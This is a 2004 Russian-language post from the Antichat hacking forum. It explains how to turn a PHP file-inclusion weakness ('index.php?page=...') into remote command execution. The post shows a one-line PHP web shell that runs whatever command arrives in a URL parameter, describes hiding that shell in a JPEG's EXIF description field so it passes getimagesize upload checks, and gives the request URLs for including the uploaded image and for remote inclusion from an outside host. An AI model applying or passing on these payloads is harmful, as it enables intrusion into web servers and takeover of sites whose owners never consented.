ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
Перезагрузить страницу Открыл я для себя интересную вещ
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #1  
Старый 22.07.2004, 23:16
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0

Репутация: 82
Отправить сообщение для zFailure с помощью ICQ
По умолчанию
Если вам приходилось сталкиваться с сайтами подобной структуры:

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">index.php?page=xxx/zzz.php[/QUOTE]<span id='postcolor'>

Конечно, вы сначала попытаетесь вызвать ошибку в скрипте или сразу попробовать подключить свой файл:

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">index.php?page=blablabla
index.php?page=http://hacker.narod.ru/xxx/zzz.php[/QUOTE]<span id='postcolor'>

В ответ вы получаете обидный отказ =)
Скорее всего там используется проверка функцией file_exists или is_file.

Но вдруг вам крупно везет и вы обнаруживаете форум, чат, гостевую, галерею или еще бог знает, что позволяющее нам загрузить на сервер картинку в формате jpg или gif.

Вы создаете файл php_injection.gif

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><pre><h4><?php
system($_GET['cmd']);
?></h4></pre>[/QUOTE]<span id='postcolor'>

Упрямый скрипт снова посылает вас, на этот раз ему помогла распознать подвох функция getimagesize.


Короче (я честно говоря этого не знал) с помощью ACDSee или подобных программ, для работы с графикой, в графический файл формата jpg можно запихнуть дополнительную информацию (так называемую EXIF Metadata). При этом вводимая нами информация помещается в изображение в открытом виде, не нарушая структуры самого изображения.

ACDSee -&gt; php_injection.jpg -&gt; Properties -&gt; EXIF Metadata -&gt; Image description = &quot;&lt;pre&gt;&lt;h4&gt;&lt;?php system($_GET['cmd']); ?&gt;&lt;/h4&gt;&lt;/pre&gt;&quot;;

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">... Exif II*    3 &amp; i‡  Y <pre><h4><?php system($_GET['cmd']); ?></h4></pre>  †’  k ...[/QUOTE]<span id='postcolor'>
Это часть бинарного файла изображения.

Как ни странно теперь скрипт согласился загрузить картинку на сервер и мы ее успешно встраиваем.

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">index.php?page=photos/imagename.jpg[/QUOTE]<span id='postcolor'>


Если вдруг это полный бред и никому не интересен – вы уж простите меня.
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ